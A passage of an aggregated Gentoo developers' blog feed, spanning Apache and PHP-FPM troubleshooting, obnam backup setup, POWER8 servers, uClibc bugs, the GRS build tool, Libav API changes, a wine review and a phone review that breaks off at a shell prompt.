Apache supports threads, and is using the Event MPM
# apache2 -V | grep 'Server MPM\|threaded'
Server MPM:     event
  threaded:     yes (fixed thread count)

Apache / vhost syntax
# apache2ctl configtest
 * Checking apache2 configuration ...     [ ok ]

5. Troubleshooting:

So you followed the directions here, and it didn’t go flawlessly?! Hark! 😮 In all seriousness, there are several potential points of failure for setting up Apache to communicate with PHP-FPM via mod_proxy_fcgi, but fortunately, there are some methods for troubleshooting (one of the beauties of Linux and other UNIX derivatives is logging).

By default, mod_proxy and mod_proxy_fcgi will report errors to the log that you have specified via the ErrorLog directive, either in your overall Apache configuration, or within each vhost. Those logs serve as a good starting point for tracking down problems. For instance, before I had appropriately set the UNIX socket permission options in php-fpm.conf, I noticed these errors:

[Wed Jul 08 00:03:26.717538 2015] [proxy:error] [pid 2582:tid 140159555143424] (13)Permission denied: AH02454: FCGI: attempt to connect to Unix domain socket /var/run/php-fpm/site1.sock (*) failed
[Wed Jul 08 00:03:26.717548 2015] [proxy_fcgi:error] [pid 2582:tid 140159555143424] [client 52350] AH01079: failed to make connection to backend: httpd-UDS

The "Permission denied" error indicated that Apache didn’t have permission to write to the UNIX socket. Setting the permissions accordingly—see the listen.owner and listen.group directives portion of subsection 3f—fixed the problem.

Say that the errors don’t provide detailed enough information, though. You can set the LogLevel directive (again, either in your overall Apache configuration, or per vhost) to substantially increase the verbosity—to debug or even trace levels. You can even change the log level just for certain modules, so that you don’t get bogged down with information that is irrelevant to your particular error. For instance:

LogLevel warn proxy:debug proxy_fcgi:debug

will set the overall LogLevel to “warn,” but the LogLevel for mod_proxy and mod_proxy_fcgi to “debug,” in order to make them more verbose.

6. Conclusion:

If you’ve stuck with me throughout this gigantic post, you’re either really interested in systems engineering and the web stack, or you may have some borderline masochistic tendencies. 😛 I hope that you have found the article helpful in setting up Apache to proxy PHP interpretation to PHP-FPM via mod_proxy_fcgi, and that you’re able to see the benefits of this type of offloading. Not only does this method of processing PHP files free up resources so that Apache can serve more simultaneous connections with fewer resources, but it also more closely adheres to the UNIX philosophy of having applications perform only one task, and do so in the best way possible.

If you have any questions, comments, concerns, or suggestions, please feel free to leave a comment.


August 05, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
My application base: Obnam (August 05, 2015, 20:35 UTC)

It is often said, yet too often forgotten: take backups (and verify that they work). Taking backups is not purely for companies and organizations; individuals should also take backups to ensure that, in case of errors or calamities, all important files are readily recoverable.

For backing up files and directories, I personally use obnam, after playing around with Bacula and attic. Bacula is more meant for large distributed environments (although I also tend to use obnam for my server infrastructure) and was too complex for my taste. The choice between obnam and attic is even more personally-oriented.

I found attic to be faster, but with a small supporting community. Obnam was slower, but seems to have a more active community which I find important for infrastructure that is meant to live quite long (you don't want to switch backup solutions every year). I also found it pretty easy to work with, and to restore files back, and Gentoo provides the app-backup/obnam package.

I think both are decent solutions, so I had to make one choice and ended up with obnam. So, how does it work?

Configuring what to backup

The basic configuration file for obnam is /etc/obnam.conf. Inside this file, I tell which directories need to be backed up, as well as which subdirectories or files (through expressions) can be left alone. For instance, I don't want obnam to backup ISO files as those have been downloaded anyway.

repository = /srv/backup
root = /root, /etc, /var/lib/portage, /srv/virt/gentoo, /home
exclude = \.img$, \.iso$, /home/[^/]*/Development/Centralized/.*
exclude-caches = yes

keep = 8h,14d,10w,12m,10y

The root parameter tells obnam which directories (and subdirectories) to back up. With exclude a particular set of files or directories can be excluded, for instance because these contain downloaded resources (and as such do not need to be inside the backup archives).

Obnam also supports the CACHEDIR.TAG specification, which I use for the various cache directories. With the use of these cache tag files I do not need to update the obnam.conf file with every new cache directory (or software build directory).

The last parameter in the configuration that I want to focus on is the keep parameter. Every time obnam takes a backup, it creates what it calls a new generation. When the backup storage becomes too big, administrators can run obnam forget to drop generations. The keep parameter informs obnam which generations can be removed and which ones can be kept.

In my case, I want to keep one backup per hour for the last 8 hours (I normally take one backup per day, but during some development sprees or photo manipulations I back up multiple times), one per day for the last two weeks, one per week for the last 10 weeks, one per month for the last 12 months and one per year for the last 10 years.

Obnam will clean up only when obnam forget is executed. As storage is cheap, and the performance of obnam is sufficient for me, I do not need to call this very often.
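Since forget permanently removes generations, it is prudent to preview the operation first. Obnam supports a --pretend (dry-run) option for this; verify against your obnam version:

```
~# obnam forget --pretend
```

This lists the generations that would be removed under the configured keep policy, without touching the repository.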

Backing up and restoring files

My backup strategy is to back up to an external disk, and then synchronize this disk with a personal backup server somewhere else. This backup server runs no software beyond OpenSSH (to allow secure transfer of the backups), and both the backup server disks and the external disk are LUKS encrypted. Considering that I don't hold government secrets, I opted not to encrypt the backup files themselves, but Obnam does support that (through GnuPG).
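Concretely, the cron-driven part of that strategy could be sketched as a crontab entry like this (hypothetical schedule, repository path, and backup host name):

```
# daily backup at 02:00, then sync the repository off-site
0 2 * * * obnam backup && rsync -a --delete /srv/backup/ backuphost:/srv/backup/
```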

All backup-enabled systems use cron jobs which execute obnam backup to take the backup, and use rsync to synchronize the finished backup with the backup server. If I need to restore a file, I use obnam ls to see which file(s) I need to restore (add a --generation= option to list the files of a backup generation other than the last one).
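As a sketch only (the post does not show the actual cron jobs, and the paths and hostname here are placeholders, not from the post), such a cron entry could look like:

```shell
# Hypothetical crontab entry: nightly obnam backup, then push the
# finished backup repository on the external disk to the off-site
# server with rsync.  "/srv/backup" and "backupserver" are made up.
30 3 * * *  obnam backup && rsync -a --delete /srv/backup/ backupserver:/srv/backup/
```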

Then, the command to restore is:

~# obnam restore --to=/var/restore /home/swift/Images/Processing/*.NCF

Or I can restore immediately to the directory again:

~# obnam restore --to=/home/swift/Images/Processing /home/swift/Images/Processing/*.NCF

To support multiple clients, obnam by default identifies each client through its hostname. It is possible to use different names, but hostnames are a common best practice which I don't deviate from either. Obnam is able to share blocks between clients (it is not mandatory, but supported nonetheless).

August 04, 2015
Lance Albertson a.k.a. ramereth (homepage, bugs)
Leveling up with POWER8 (August 04, 2015, 20:37 UTC)

Over the past year I've had the privilege of working on a new POWER architecture ppc64le (PowerPC 64bit Little Endian). We've had a long relationship with IBM at the Open Source Lab (OSL) providing resources for the POWER architecture to FOSS projects.

Earlier this year, IBM graciously donated three powerful POWER8 machines to the OSL to replace our aging FTP cluster. This produced a few challenges we needed to overcome to make this work:

  • We're primarily an x86 shop, so we needed to get used to the POWER8 platform in a production environment
  • This platform is extremely new, so we're on the leading edge using this hardware in a production environment
  • The IBM engineers recommended using the new ppc64le architecture, which was still gaining support from Red Hat at the time
  • There was no CentOS ppc64le build yet and RHEL 7 wasn't quite officially supported yet (however, it was added in 7.1)
  • This platform uses a different boot process than other machines, namely the OPAL firmware which uses the Petitboot boot loader

POWER8 architecture differences

We've been using IBM POWER7 hardware for many years, which requires the use of a proprietary management system called the Hardware Management Console (HMC). It was an extremely difficult system to use and felt foreign compared to how we normally manage systems. So when we got our first POWER8 system, I was delighted to see that they did away with the HMC and provided an abstraction layer called OPAL (also known as skiboot) to manage the system. Basically, it means these machines actually use open standards and boot more or less like an x86 machine (i.e. what we're used to).

When you first boot a POWER8 machine that is using OPAL, you use IPMI to connect to the serial console (which needs to be enabled in the FSP). FSP stands for Flexible Service Processor, which is basically the low-level firmware that manages the hardware of the machine. When it first boots up, you'll see a Linux kernel booting up and then a boot prompt running Petitboot, a kexec-based boot loader.

This basically allows you to do the following:

  • Auto-boots a kernel
  • Gives you a bash prompt to diagnose the machine or setup hardware RAID
  • Gives you a sensible way to install an OS remotely

When it boots an installed system, it'll actually do a kexec and reboot into the actual OS kernel. Overall, it is an easy and simple way to remotely manage a machine.

Operating System Setup

The next major challenge was creating a stable operating system environment. When I first started to test these machines, I was using a beta build of RHEL 7 for ppc64le that contained bugs. Thankfully, 7.1 was released recently, which provided a much more stable installer and platform in general. Getting the OS installed was the easy part; the more challenging part was getting our normal base system up with Chef. This required manually building a Chef client for ppc64le, since none existed yet. We ended up building the client using the Omnibus Chef build on a guest, which meant we had to bootstrap the build environment a little too.

The next challenge was installing all of the base packages and the packages we needed for running our FTP mirrors. Most of those packages are in EPEL; however, there are no ppc64le builds for the architecture (yet). So we ended up having to build many of the dependencies using mock and hosting them in a local repository. Thankfully we didn't require many dependencies, and none of the builds had compile problems.

Storage layout and configuration

One of the other interesting parts of this was the storage configuration for the servers. These machines came with five 387GB SSDs and ten 1.2TB SAS disks. The hardware RAID controller comes with a feature called RAID6T2 which provides a two-tier RAID solution that is visible as a single block device. Essentially, it uses the SAS disks for cold storage while the SSDs act as a hot cache for reads and writes.

Being a lover of open source, I was interested in seeing how this performed against other technologies such as bcache. While I no longer have all of the numbers, the hardware RAID outperformed bcache by quite a bit. Eventually I'd like to see if there are other tweaks so we aren't reliant on a proprietary RAID controller, but for now the controller is working flawlessly.

Production deployment and results

We successfully deployed all three new POWER8 servers without any issue on June 18, 2015. We're already seeing a large increase in utilization on the new machines as they have far more I/O capacity and throughput than the previous cluster. I've been extremely impressed with how stable and how fast these machines are.

Since we're on the leading edge of using these machines, I'm hoping to write more detailed and technical blog posts on the various steps I went through.

Anthony Basile a.k.a. blueness (homepage, bugs)

About five years ago, I became interested in alternative C standard libraries like uClibc and musl and their application to more than just embedded systems.  Diving into the implementation details of those old familiar C functions can be tedious, but also challenging, especially under constraints of size, performance, resource consumption, features and correctness.  Yet these details can make a big difference, as you can see from this comparison of glibc, uClibc, dietlibc and musl.  I first encountered libc performance issues when I was doing number-crunching work for my Ph.D. in physics at Cornell in the late 80’s.  I was using IBM RS/6000s (yes!) and had to jump into the assembly.  It was lots of fun and I’ve loved this sort of low-level stuff ever since.

Over the past four years, I’ve been working towards producing stage3 tarballs for both uClibc and musl systems on various arches, and with help from generous contributors (thanks guys!), we now have a pretty good selection on the mirrors.  These stages are not strictly speaking embedded in that they do not make use of busybox to provide their base system.  Rather, they employ the same packages as our glibc stages and use coreutils, util-linux, net-tools and friends.  Except for small details here and there, they only differ from our regular stages in the libc they use.

If you read my last blog post on this new release engineering tool I’m developing called GRS, you’ll know that I recently hit a milestone in this work.  I just released three hardened, fully featured XFCE4 desktop systems for amd64.  These systems are identical to each other except for their libc, again modulo a few details here and there.  I affectionately dubbed these Bluemoon for glibc, Lilblue for uClibc, and Bluedragon for musl.  (If you’re curious about the names, read their homepages.)  You can grab all three off my dev space, or off the mirrors under experimental/amd64/{musl,uclibc} if you’re looking for just Lilblue or Bluedragon — the glibc system is too boring to merit mirror space.  I’ve been maintaining Lilblue for a couple of years now, but with GRS I can easily maintain all three, and it’s nice to have them for comparison.

If you play with these systems, don’t expect to be blown away by some amazing differences.  They are there and they are noticeable, but they are also subtle.  For example, you’re not going to notice code correctness in, say, pthread_cancel() unless you’re coding some application and expect certain behavior but don’t get it because of some bad code in your libc.  Rather, the idea here is to push the limits of uClibc and musl to see what breaks and then fix it, at least on amd64 for now.  Each system includes about 875 packages in the release tarballs, and an extra 5000 or so binpkgs built using GRS.  This leads to lots of breakage which I can isolate and address.  Often the problem is in the package itself, but occasionally it’s the libc, and that’s where the fun begins!  I’ve asked Patrick Lauer for some space where I can set up my GRS builds and serve out the binpkgs.  Hopefully he’ll be able to set me up with something.  I’ll also be able to make the build.log’s available via the web for packages that fail, so that GRS will double as a poor man’s tinderbox.

In a future article I’ll discuss musl, but in the remainder of this post, I want to highlight some big ticket items we’ve hit in uClibc.  I’ve spent a lot of time building up machinery to maintain the stages and desktops, so now I want to focus my attention on fixing the libc problems.  The following laundry list is as much a TODO for me as it is for your entertainment.  I won’t blame you if you want to skip it.  The selection comes from Gentoo’s bugzilla and I have yet to compare it to upstream’s bugs since I’m sure there’s some overlap.

Currently there are thirteen uClibc stage3’s being supported:

  • stage3-{amd64,i686}-uclibc-{hardened,vanilla}
  • stage3-armv7a_{softfp,hardfp}-uclibc-{hardened,vanilla}
  • stage3-mipsel3-uclibc-{hardened,vanilla}
  • stage3-mips32r2-uclibc-{hardened,vanilla}
  • stage3-ppc-uclibc-vanilla

Here hardened and vanilla refer to the toolchain hardening, as we do for regular glibc systems.  Some bugs are arch-specific and some are common.  Let’s look at each in turn.

* amd64 and i686 are the only stages considered stable and are distributed alongside our regular stage3 releases on the mirrors.  However, back in May I hit a rather serious bug (#548950) on amd64, which is our only 64-bit arch.  The problem was in the implementation of pread64() and pwrite64() and was triggered by a change in the fsck code with e2fsprogs-1.42.12.  The bug led to data corruption of ext3/ext4 filesystems, which is a very serious issue for a release advertised as stable.  The problem was that the wrong _syscall wrapper was being used on amd64.  If we don’t require 64-bit alignment, and we don’t on a 64-bit arch (see uClibc/libc/sysdeps/linux/x86_64/bits/uClibc_arch_features.h), then we need to use _syscall4, not _syscall6.

The issue was actually fixed by Mike Frysinger (vapier) in uClibc’s git HEAD, but not in the 0.9.33 branch which is the basis of the stages.  Unfortunately, there hasn’t been a new release of uClibc in over three years, so backporting meant disentangling the fix from some new thread-cancel stuff, which was annoying.

* The armv7a stages are close to being stable, but they are still distributed on the mirrors under experimental.  The problem here is not uClibc-specific but due to hardened gcc-4.8, and it affects all our hardened arm stages.  With gcc-4.8, we’re turning on -fstack-check=yes by default in the specs, and this breaks alloca().  The workaround for now is to use gcc-4.7, but we should turn off -fstack-check for arm until bug #518598 (PR65958) is fixed.

* I hit one weird bug when building the mips stages, bug #544756.  An illegal instruction is encountered when building any version of python using gcc-4.9 with -O1 optimization or above, yet it succeeds with -O0.  What I suspect happened here is that some change in the optimization code for mips between gcc-4.8 and 4.9 introduced the problem.  I need to distill out some reduced code before I submit it to gcc upstream.  For now I’ve p.masked >=gcc-4.9 in default/linux/uclibc/mips.  Since mips lacks stable keywords, this actually brings the mips stages better in line with the other stages, which use gcc-4.8 (or 4.7 in the case of hardened arm).

* Unfortunately, ppc is plagued by bug #517160 – PIE code is broken on ppc and causes a seg fault in plt_pic32.__uClibc_main().  Since PIE is an integral part of how we do hardening in Gentoo, there’s no hardened ppc-uclibc stage.  Luckily, there are no known issues with the vanilla ppc stage3.

Finally, there are five interesting bugs which are common to all arches.  These problems lie in the implementation of functions in uClibc and deviate from the expected behavior.  I’m particularly grateful to the people who found them by running the test suites of various packages.

* Bug 527954 – One of wget’s tests makes use of fnmatch(3), which intelligently matches file names or paths.  On uClibc, there is an unexpected failure in a test where it should return a non-match: when fnmatch’s options contain FNM_PATHNAME and a matching slash is not present in both strings.  Apparently this is a duplicate of a really old bug (#181275).

* Bug 544118 – René noticed this problem in an e2fsprogs test.  The failure here is due to the fact that setbuf(3) is ineffective at changing the buffering of stdout if it is called after some printf(3).  Output to stdout is buffered while output to stderr is not.  This particular test tries to preserve the order of output from a sequence of writes to stdout and stderr by setting the buffer size of stdout to zero.  But on uClibc, setbuf() only works if it is invoked before any output to stdout.  As soon as there is even one printf(), all invocations of setbuf(stdout, …) are ineffective!

* Bug 543972 – This one came up in the gzip test suite.  One of the tests there checks to make sure that gzip properly fails if it runs out of disk space.  It uses /dev/full, a pseudo-device provided by the kernel that pretends to always be full.  The expectation is that fclose() should set errno = ENOSPC when closing a stream on /dev/full.  It does on glibc but it doesn’t on uClibc.  The failure actually occurs when piping stdout to /dev/full, so the problem may even be in dup(2).

* Bug 543668 – There is some problem in uClibc’s dlopen()/dlclose() code.  I wrote about this in a previous blog post and also hit it with syslog-ng’s plugin system.  A seg fault occurs when unmapping a plugin from the memory space of a process during do_close() in uClibc/ldso/libdl/libdl.c.  My guess is that the problem lies in uClibc’s accounting of the mappings: when it tries to unmap an area of memory which is not mapped or was previously unmapped, it seg faults.

August 03, 2015
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)

This past weekend, I was visiting my good friends at The Wine Barrel for their weekly wine tasting, and I got a neat surprise when I was there. Certified Sommelier Mike Ward of Ward on Wine was there with a new project of his called Syncopation. Syncopation is a private-label red wine blend produced in Augusta, MO, which, if you didn’t know, was the first AVA recognised by the United States Federal Government in 1980 (beating out Napa).

Having been to some of Mike’s classes (including ones about two of my favourite countries for wine [Italy and Spain]), I was confident that any wine he would stand behind would be a worthwhile investment. Though I’m not usually partial to wines from Missouri, the way that he described Syncopation as being “medium bodied with some nice red fruits and a little spice” was enticing to me. Before getting to my personal impressions and review of Syncopation Rhythmic Red blend, here are some interesting notes about it:

  • It is a blend of Chambourcin, Vidal blanc, Seyval blanc, and Traminette
    • Chambourcin is really a red grape, whilst the other three are white grapes
    • Chambourcin can be made so that it is dry or semi-sweet
    • Vidal blanc is related to Trebbiano, which is a grape noted for wines from Italy and France (where it is more commonly known as Ugni blanc)

Mike indicated to me that this particular wine is best enjoyed at a slightly chilled temperature (16-18°C / 60-65°F), but that I should try it right out of the bottle beforehand, and make my own assessments. I will agree with him that it is better with a light chill on it, and after it has decanted for 20-30 minutes. Since I did try it both ways, I will separate my tasting notes into two corresponding sections.

Right out of the bottle
When I first tried Syncopation, I noticed a slight sweetness to it, which is the signature of some of the white blends from St. James Winery and others in Missouri. It was forward with a burst of freshly picked strawberries, and had delicate notes of Victoria plums in the mid-palate. It was light-to-medium bodied, and had an almost effervescent mouthfeel, though there were no bubbles at all.

Chilled accordingly
After my bottle of Syncopation had chilled to the recommended temperature, I tried it again. To me, the differences were night and day! As expected, the slight chill intensified the flavours of strawberry and plum that I had originally noted, making them more bold and readily recognisable. The effervescence that I mentioned was no longer present, and the mouthfeel had tightened to a more medium-body. Most impressive to me was how the chilling and decanting brought some underlying subtleties to the surface. I really enjoyed some notes of cherry cola, white pepper, and most prominently, coastal sage scrub.

Mike Ward and Zach – First sale of Syncopation Red Wine

Overall impressions
As someone who enjoys the intense wines of Priorat, Spain and yet the subtleties of a Brunello di Montalcino, I found Syncopation to be a bit light for my preference. That being said, it is an approachable red wine for sweet and semi-sweet white wine lovers, yet tannic enough to appease staunch red drinkers. To me, Syncopation lives up to its name in that it is rhythmic and flowing. It also captures the joys of summer, and is able to—with its beautiful notes of strawberry and white-fleshed plum—cut through the ofttimes oppressive humidity that can accompany a Saint Louis August. If you think you know what Missouri wines are “all about,” or if you just would like an unassuming light-to-medium red blend that is new and exciting, I urge you to give Syncopation a try!


July 31, 2015
Anthony Basile a.k.a. blueness (homepage, bugs)

The other day I installed Ubuntu 15.04 on one of my boxes.  I just needed something where I could throw in a DVD, hit install and be done.  I didn’t care about customization or choice, I just needed a working Linux system from which I could do my chroot work.  Thousands of people around the world install Ubuntu this way and when they’re done, they have a stock system like any other Ubuntu installation, all identical like frames in an Andy Warhol lithograph.  Replication as a form of art.

In contrast, when I install a Gentoo system, I enjoy the anxiety of choice.  Should I use syslog-ng, metalog, or skip a system logger altogether?  If I choose syslog-ng, then I have a choice of 14 USE flags for 2^14 possible configurations for just that package.  And that’s just one of some 850+ packages that are going to make up my desktop.  In contrast to Ubuntu where every installation is identical (whatever “idem” means in this context), the sheer space of possibilities makes no two Gentoo systems the same unless there is some concerted effort to make them so.  In fact, Gentoo doesn’t even have a notion of a “stock” system unless you count the stage3s, which are really bare bones.  There is no “stock” Gentoo desktop.

With the work I am doing with uClibc and musl, I needed a release tool that would build identical desktops repeatedly and predictably, where all the choices of packages and USE flags were laid out a priori in some specifications.  I considered catalyst stage4, but catalyst didn’t provide the flexibility I wanted.  I initially wrote some bash scripts to build an XFCE4 desktop from uClibc stage3 tarballs (what I dubbed “Lilblue Linux”), but this was very much ad hoc code and I needed something that could be generalized, so I could do the same for a musl-based desktop, or indeed any Gentoo system I could dream up.

This led me to formulate the notion of what I call a “Gentoo Reference System” or GRS for short — maybe we could make stock Gentoo systems available.  The idea here is that one should be able to define some specs for a particular Gentoo system that will unambiguously define all the choices that go into building that system.  Then all instances built according to those particular GRS specs would be identical in much the same way that all Ubuntu systems are the same.  In a Warholian turn, the artistic choices in designing the system would be pushed back into the specs and become part of the automation.  You draw one frame of the lithograph and you magically have a million.

The idea of these systems being “references” was also important for my work because, with uClibc or musl, there’s a lot of package breakage — remember, you’re pushing up against actual implementations of C functions, and nearly everything in your system is written in C.  So, in the space of all possible Gentoo systems, I needed some reference points that worked.  I needed that magical combination of flags and packages that would build and yield useful systems.  It was also important that these references be easily kept working over time, since Gentoo systems evolve as the main tree, or overlays, are modified.  Since on some successive build something might break, I needed to quickly identify the delta and address it.  The metaphor that came up in my head from my physics background is that of phase space.  In the swirling mass of evolving dynamical systems, I pictured these “Gentoo Reference Systems” as markers etching out a well defined path over time.

Enough with the metaphors; how does GRS work?  There are two main utilities, grsrun and grsup.  The first is run on a build machine and generates the GRS release as well as any extra packages and updates.  These are delivered as binpkgs.  In contrast, grsup is run on an installed GRS instance and it’s used for package management.  Since we’re working in a world of identical systems, grsup prefers working with binpkgs that are downloaded from some build machine, but it can revert to building locally as well.

The GRS specs for some system are found on a branch of a git repository.  Currently the repo has four branches, each for one of the four GRS specs housed there.  grsrun is then directed to sync the remote repo locally, check out the branch of the GRS system we want to build, and begin reading a script file called build which directs grsrun on what steps to take.  The scripting language is very simple and contains only a handful of different directives.  After a stage tarball is unpacked, build can direct grsrun to do any of the following:

mount and umount – Do a bind mount of /dev/, /dev/pts/ and other directories that are required to get a chroot ready.

populate – Selectively copy files from the local repo to the chroot.  Any files can be copied in, so, for example, you can prepare a pristine home directory for some user with a pre-configured desktop.  Or you can add customized configuration files to /etc for services you plan to run.

runscript – This will run some bash or python script in the chroot.  The scripts are copied from the local repo to /tmp of the chroot and executed there.  These scripts can be like the ones that catalyst runs during stage1/2/3, but can also be scripts to add users and groups, to add services to runlevels, etc.  Think of anything you would do when growing a stage3 into the system you want, script it up, and GRS will automate it for you.

kernel – This looks for a kernel config file in the local repo, parses it for the version, builds the kernel, and both bundles it as a package called linux-image-<version>.tar.xz for later distribution and installs it into the chroot.  grsup knows how to work with these linux-image-<version>.tar.xz files and can treat them like binpkgs.

tarit and hashit – These directives create a release tarball of the entire chroot and generate the digests.

pivot – If you built a chroot within a chroot, like catalyst does during stage1, then this pivots the inner chroot out so that further building can make use of it.
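Putting the directives together, a build script could look something like this (a sketch only; the post does not show an actual build file, and the script and config names here are invented for illustration):

```text
mount                       # bind mount /dev, /dev/pts, etc. into the chroot
populate                    # copy in pre-configured /etc and /home files
runscript setup-users.sh    # add users/groups, add services to runlevels
runscript install-xfce4.sh  # grow the stage3 into the desktop system
kernel                      # build the kernel from the repo's config file
tarit                       # create the release tarball of the chroot...
hashit                      # ...and generate its digests
umount                      # tear the chroot mounts back down
```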

From an implementation point of view, the GRS suite is written in python and each of the above directives is backed by a simple python class.  It’s easy, for instance, to implement more directives this way.  E.g. if you want to build a bootable CD image, you can include a directive called isoit, write a python class for what’s required to construct the iso image, and glue this new class into the grs module.

If you’re familiar with catalyst, at this point you might be wondering what’s the difference?  Can’t you do all of this with catalyst?  There is a lot of overlap, but the emphasis is different.  For example, I wanted to be able to drop in a pre-configured desktop for a user.  How would I do that with catalyst?  I guess I could create an overlay with packages for some pre-built home directory, but that’s a perversion of what ebuilds are for — we should never be installing into /home.  Rather, with grsrun I can just populate the chroot with whatever files I like anywhere in the filesystem.  More importantly, I want to be able to control what USE flags are set and, in general, manage all of /etc/portage/.  catalyst does provide portage_configdir, which populates /etc/portage when building stages, but it’s pretty static.  Instead, grsup and two other utilities, install-worldconf and clean-worldconf, can dynamically manage files under /etc/portage/ according to a configuration file called world.conf.

Lapsing back into metaphor, I see catalyst as rigid and frozen whereas grsrun is loose and fluid.  You can use grsrun to build stage1/2/3 tarballs which are identical to those built with catalyst, and in fact I’ve done so for hardened amd64 multilib stages so I could compare.  But with grsrun you have a lot of freedom in writing the scripts and files that go into the GRS specs, and chances are you’ll get something wrong, whereas with catalyst the build is pretty regimented and you’re guaranteed to get uniformity across arches and profiles.  So while you can do the same things with each tool, it’s not recommended that you use grsrun to do catalyst stage builds — there’s too much freedom.  Whereas when building desktops or servers you might welcome that freedom.

Finally, let me close with how grsup works.  As mentioned above, the GRS specs for some system include a file called world.conf.  It’s in configparser format and it specifies files and their contents in the /etc/portage/ directory.  An example section in the file looks like:

package.use : app-crypt/gpgme:1 -common-lisp static-libs
package.env : app-crypt/gpgme:1 app-crypt_gpgme_1
env : LDFLAGS=-largp

This says: for package app-crypt/gpgme:1, drop a file called app-crypt_gpgme_1 in /etc/portage/package.use/ that contains the line “app-crypt/gpgme:1 -common-lisp static-libs”, drop another file by the same name in /etc/portage/package.env/ with the line “app-crypt/gpgme:1 app-crypt_gpgme_1”, and finally drop a third file by the same name in /etc/portage/env/ with the line “LDFLAGS=-largp”.  grsup is basically a wrapper around emerge which first populates /etc/portage/ according to the world.conf file, then emerges the requested pkg(s), preferring the use of binpkgs over building locally as stated above, and finally does a clean up on /etc/portage/.  install-worldconf and clean-worldconf isolate the populate and clean-up steps so they can be used in scripts run by grsrun when building the release.  To be clear, you don’t have to use grsup to maintain a GRS system.  You can maintain it just like any other Gentoo system, but if you manage your own /etc/portage/, then you are no longer tracking the GRS specs.  grsup is meant to make sure you update, install or remove packages in a manner that keeps the local installation in compliance with the GRS specs for that system.

All this is pretty alpha stuff, so I’d appreciate comments on design and implementation before things begin to solidify.  I am using GRS to build three desktop systems which I’ll blog about next.  I’ve dubbed these systems Lilblue, which is a hardened amd64 XFCE4 desktop with uClibc as its standard libc, Bluedragon, which uses musl, and finally Bluemoon, which uses good old glibc.  (Lilblue is actually a few years old, but the latest release is the first built using GRS.)  All three desktops are identical with respect to the choice of packages and USE flags, and differ only in their libc’s so one can compare the three.  Lilblue and Bluedragon are on the mirrors, or you can get all three from my dev space.  I didn’t push out Bluemoon on the mirrors because a glibc-based desktop is nothing special.  But since building with GRS is as simple as cloning a git branch and tweaking, and since the comparison is useful, why not?

The GRS home page is at

July 30, 2015
Luca Barbato a.k.a. lu_zero (homepage, bugs)
Cleaner API (July 30, 2015, 17:50 UTC)

We are getting closer to a new release, and you can tell it is an even release by the amount of old and crufty code we are dropping. This is usually welcomed by some people and hated by others. This post tries to explain what we do and why we are doing it.

New API and old API

Since the start of Libav we have tried to address the painful shortcomings of the previous management; here is the short list:

  • No leaders or dictators, there are rules agreed by consensus and nobody bends them.
  • No territoriality, nobody “owns” a specific area of the codebase nor has special rights on it.
  • No unreviewed changes in the tree, all the patches must receive an Ok by somebody else before they can be pushed in the tree.
  • No “cvs is the release”, major releases at least twice per year, bugfix-only point releases as often as needed.
  • No flames and trollfests, some basic code of conduct is enforced.

One of the effects of this is that the APIs are discussed, proposals are documented, and little by little we are migrating to a hopefully more rational and less surprising API.

What’s so bad regarding the old API?

Many of the old APIs were not designed at all, but just randomly added because mplayer or ffmpeg.c happened to need some
feature at the time. The result was usually un(der)documented, hard to use correctly and often not well defined in some cases. Most users of the old API that I’ve seen actually used it wrong and would at best occasionally fail to work, at worst crash randomly.
– Anton

To expand a bit on that you can break down the issues with the old API in three groups:

  • Unnamespaced common names (e.g. CODEC_ID_NONE); those may or may not clash with other libraries.
  • Now-internal-only fields that were previously exposed and that users expected to be something they really are not (e.g. AVCodecContext.width).
  • Functionality that was not really working well (e.g. the old audio resampler), for which a replacement was eventually provided (avresample).

The worst result of API misuse could be a crash in specific situations (e.g. if you use the AVCodecContext dimensions when you should use the AVFrame dimensions to allocate your screen surface, you get quite an ugly crash, since the former represent the decoding-time dimensions while the latter are the dimensions of the frame you are going to present, and they can vary a LOT).

But Compatibility ?!

In Libav we try our best to provide migration paths, and in the past years we even went the extra mile by providing patches for quite a bit of software Debian was distributing at the time. (Since nobody even thanked us for the effort, I doubt the people involved would do that again…)

Keeping backwards compatibility forever is not really feasible:

  • You do want to remove a clashing symbol from your API.
  • You do not want applications crashing because of wrong assumptions.
  • You do want people to use the new API, rather than keeping compatibility wrappers around that might not work in certain corner cases.

The current consensus is to keep an API deprecated for about 2 major releases; with release 12 we are dropping code that has been deprecated for 2-3 years.


I have been busy with my day-job deadlines, so I could not progress on the new API for avformat and avcodec I described before; the next blog post will probably be longer and a bit more technical again.

July 27, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)

One in every 600 websites has .git exposed

July 25, 2015
Doogee Y100 Pro (July 25, 2015, 23:37 UTC)

For a while, I have been looking for a replacement for my Nexus 4. I have been mostly pleased with it, but not completely. The two things that bothered me most were the lack of dual-SIM and (usable) LTE.

So I ordered a Doogee Valencia2 Y100 Pro at Gearbest when it was announced in June, which seemed to be almost the perfect device for my needs and at 119 USD quite inexpensive too.

Pre-ordering a phone from a Chinese manufacturer without any existing user reports is quite a risk. Occasionally, these phones turn out to be not working well and getting after-sales support or even updates can be difficult. I decided to take the plunge anyway.

Two very good reviews have been published on YouTube in the meantime. You may want to check them out:

My phone arrived two days ago, so here are my initial impressions:

The package contents

The phone came with a plastic hardcover and screen protector attached. In the box there was a charger and USB cable, headphones, a second screen protector and an instruction manual.

Gearbest also included a travel adaptor for the charger. Some assembly required.


Phone specs: Advertisement and reality

The advertised specs of the phone (5" 720p screen, MT6735 64-bit quad-core, 13 MP camera, 2200 mAh battery, etc.) sounded almost too good to be true for the price. Unfortunately, they turned out to be exactly that.

The following list contrasts the advertised specs with reality:

  • Screen: 5" 1280x720 IPS capacitive 5-point touch screen advertised; as advertised.
  • SoC: Mediatek MT6735 64-bit, 1.0 GHz advertised; in reality a Mediatek MT6735P at 1.0 GHz, and the phone comes with 32-bit Android installed. (The clock frequency was originally advertised as 1.3 GHz, but later changed to 1.0 GHz without notice. The MT6735P also has a slower GPU than the MT6735.)
  • Memory: 2 GB RAM, 16 GB flash memory advertised; as advertised.
  • Cameras: 13 MP rear and 8 MP front advertised; 13 MP and 8 MP are most likely only interpolated.
  • Battery: 2200 mAh advertised; in reality 1800 mAh. (There is a sticker on the battery which says 2200 mAh, but peeling it off reveals the manufacturer label, which says 1800 mAh.)
  • Weight: 151 g including battery advertised; in reality 159 g including battery (weighed on a kitchen scale).

This kind of exaggeration appears to be common for phones in the Chinese domestic market. But some folks still need to learn that when doing business internationally, such trickery just hurts your reputation.

With that out of the way, let's take a closer look at the device:

CPU and Linux kernel

$ uname -a
